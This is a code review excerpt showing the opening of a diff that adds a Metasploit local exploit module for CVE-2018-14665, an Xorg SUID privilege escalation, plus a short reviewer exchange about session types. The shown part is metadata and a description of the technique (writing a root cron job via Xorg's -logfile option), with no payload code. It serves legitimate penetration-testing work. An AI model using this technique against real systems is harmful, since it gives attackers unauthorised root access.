modules/exploits/openbsd/local/xorg_x11_suid_server.rb

```diff
@@ -0,0 +1,171 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::Common
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+  include Msf::Post::Linux::Priv
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Xorg X11 Server SUID privilege escalation',
+      'Description'    => %q{
+        This module attempts to gain root privileges with SUID Xorg X11 server
+        versions prior to 1.20.3.
+
+        A permission check flaw exists for -modulepath and -logfile options when
+        starting Xorg prior to 1.20.3.  This allows unprivileged users with the
+        ability to log in to the system via console to escalate their privileges
+        and run arbitrary code under root privileges (CVE-2018-14665).
+
+        This module writes a cron job using the Xorg -logfile option. The job
+        will run a small script to launch an executable. It has been tested with
+        OpenBSD 6.3,6.4 and CentOS 7.  Xorg must have SUID permissions. Success
+        on CentOS depends on the session having console for starting Xorg
+        along with selinux settings, may work but is currently not supported.
+
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Narendra Shinde', # Discovery and exploit
+          'Raptor - 0xdea',  # Modified exploit for cron
+          'Aaron Ringo'      # Metasploit module
+        ],
+
+      'DisclosureDate' => 'Oct 25 2018',
+      'Platform'       =>  %w(linux unix openbsd),
+      'Arch'           =>    ARCH_CMD,
+      'SessionTypes'   =>    'shell', #Shell is needed to start Xorg in Linux
```

Comment:
Is there a reason this won't work with Meterpreter?

Reply:
I don't think it is, but `SessionTypes` is more for module-to-session compatibility, not whether a particular payload exists. If you want to leave it off, that's fine.